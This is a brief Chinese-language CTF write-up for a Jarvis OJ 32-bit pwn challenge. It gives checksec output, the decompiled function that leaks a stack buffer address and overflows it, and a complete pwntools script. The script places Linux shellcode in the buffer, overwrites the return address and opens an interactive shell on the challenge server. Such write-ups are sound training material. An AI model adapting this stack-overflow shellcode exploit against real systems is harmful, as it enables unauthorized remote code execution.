checksec:

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

main函数调用了vulnerable_function(),其内容如下:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);
  return read(0, &buf, 0x100u);
}

因为关闭了NX保护,且打印了buf的地址,可以把shellcode写入已知地址的buf变量中,然后计算偏移量,最后利用溢出把地址返回到buf执行shellcode。

from pwn import *

io = remote('pwn2.jarvisoj.com','9877')
shell= asm(shellcraft.i386.linux.sh())
buf_addr =  int(io.recvline()[12:-2],16)
shell_addr = shell+'a'*(0x88+0x4-len(shell))+p32(buf_addr)
io.sendline(shell_addr)
io.interactive()